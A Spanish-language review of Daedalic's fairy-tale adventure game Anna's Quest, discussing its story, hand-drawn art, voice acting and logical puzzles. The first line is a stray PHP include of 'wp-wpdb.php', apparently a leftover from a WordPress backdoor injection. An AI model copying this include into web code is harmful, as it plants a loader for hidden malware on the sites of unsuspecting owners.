if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Anna’s Quest – La Fortaleza de LeChuck

Análisis Anna’s Quest

Daedalic, la compañía famosa por las aventuras gráficas como Deponia, nos trae esta vez Anna’s Quest, y aunque tengo que confesar que cuando me puse delante del título tenía cierta desconfianza, enseguida desapareció y en los primeros minutos de juego descubrí algo entrañable y entretenido. ¿Os gustan los cuentos? Pues tomad asiento, que vamos a empezar con las mágicas aventuras de Anna.

anna-quest

Anna’s Quest es una aventura gráfica al viejo estilo point&click ambientada en los cuentos clásicos, pero con una dosis de humor negro y la sutil ironía de su protagonista, Anna, una niña que vive con su abuelo pero al caer este enfermo emprende un largo viaje para buscar la cura de su extraña enfermedad. Sin embargo, ahí afuera hay brujas, ladrones, extrañas criaturas y lugares misteriosos. Su abuelo ya la advirtió que era peligroso adentrarse en el bosque pero Anna no se doblega ante nada y en una de las situaciones difíciles que vive desarrolla unos poderes telequinésicos con los que puede mover cosas con la mente y le serán de gran ayuda.

anna-quest2
A veces nos encontraremos peleas contra «bosses»

En uno de los aspectos donde destaca Anna’s Quest es en el apartado artístico. Ese bonito diseño tradicional es obra del diseñador Krams, quien consigue trasmitir la sensación de estar pasando las páginas de un libro con su estupendo trabajo en los escenarios detallados y coloridos y en el diseño de personajes caricaturescos. Y ya que nombramos a los personajes, el juego nos presenta un buen reparto de seres, nos toparemos con brujas malignas secuestra niños, magos, caballeros, criaturas que habitan los lagos, animales parlanchines y humanos curiosos. Muchos de estos personajes pertenecen a cuentos clásicos y han sido reimaginados, e incluso parodiados, para la ocasión. Particularmente me hizo mucha gracia encontrarme a «Los Trotamúsicos» (Los músicos de Bremen), al resto os dejo que lo descubráis vosotros. En cuanto al apartado sonoro, la música ensalza la representación de cuento de hadas con melodías alegres y misteriosas, también merecen una mención las buenas interpretaciones de los actores de voz en sus diversos papeles.

anna-quest5
un, dos, tres, cuatro, somos cuatro…

Hablemos ahora de los puzles. Anna’s Quest es un juego diseñado para que la resolución de puzles sea sencilla y divertida, como todo el juego en sí. La combinación de objetos parte de la lógica más contundente, aunque en algunas ocasiones tendremos que ejecutarlos en el momento adecuado. Nuestros poderes telequinésicos tendrán un papel importante a la hora de superar las situaciones más complicadas, y cuando lo hayamos probado todo, o veamos que algún objeto esta fuera de nuestro alcance, será un buen momento para usar el icono de telequinesis. No obstante, no solo nos servirá para resolver puzles, también podremos hacer alguna que otra trastada. Lo último que quiero destacar de este apartado es que los puzles no se pueden resolver hasta que no haya una buena razón para ello, todo lo contrario que pasa en muchos juegos, que se comienzan a resolver acertijos sin saber bien por qué ni para qué, por lo que en Anna’s Quest han acertado haciendo que los puzles fluyan de manera natural con la narrativa.

anna-quest4
Los tenderos siempre haciendo gala de su amabilidad

Daedalic se ha desmarcado de títulos anteriores haciendo una aventura gráfica más simple pero no por ello aburrida. Anna’s Quest es un juego muy entretenido y visualmente encantador, y una pieza ideal para que los aventureros más jóvenes se adentren en el género. Aunque tampoco decepcionará a los más experimentados, que quizá recuerden parte de los libros que de pequeños tenían en sus estanterías.

Por ultimo, recordaros que existe una edición física de Anna’s Quest de Avance Discos de venta en tiendas Game.